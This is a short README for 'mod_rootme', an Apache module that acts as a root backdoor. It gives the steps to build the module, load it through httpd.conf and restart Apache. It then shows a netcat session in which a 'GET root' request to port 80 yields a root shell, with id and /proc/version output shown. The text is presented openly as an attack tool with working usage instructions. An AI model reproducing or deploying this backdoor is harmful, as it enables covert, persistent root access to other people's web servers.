


           mod_rootme: making Apache almost as insecure as IIS 5



    Installing mod_rootme
    ----------------------

        Simply run make, then copy mod_rootme.so into the apache
        modules directory (usually /usr/lib/apache/1.3/). You'll
        also have to add this line in your /etc/apache/httpd.conf:

        LoadModule rootme_module /usr/lib/apache/1.3/mod_rootme.so

        Finally, restart apache with "apachectl restart"


    Using mod_rootme
    ----------------

        Make sure you have netcat installed on your system
        (the telnet client will not work for this purpose)

        $ nc 192.168.1.21 80
        HEAD / HTTP/1.0

        HTTP/1.1 200 OK
        Date: Mon, 21 Jun 2004 16:08:02 GMT
        Server: Apache/1.3.26 (Unix) Debian GNU/Linux
        [...]

        $ nc 192.168.1.21 80
        GET root HTTP/1.0

        id
        uid=0(root) gid=0(root) groups=0(root)
        cat /proc/version
        Linux version 2.4.26 (root@gray) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 Tue Jun 15 10:15:34 CEST 2004


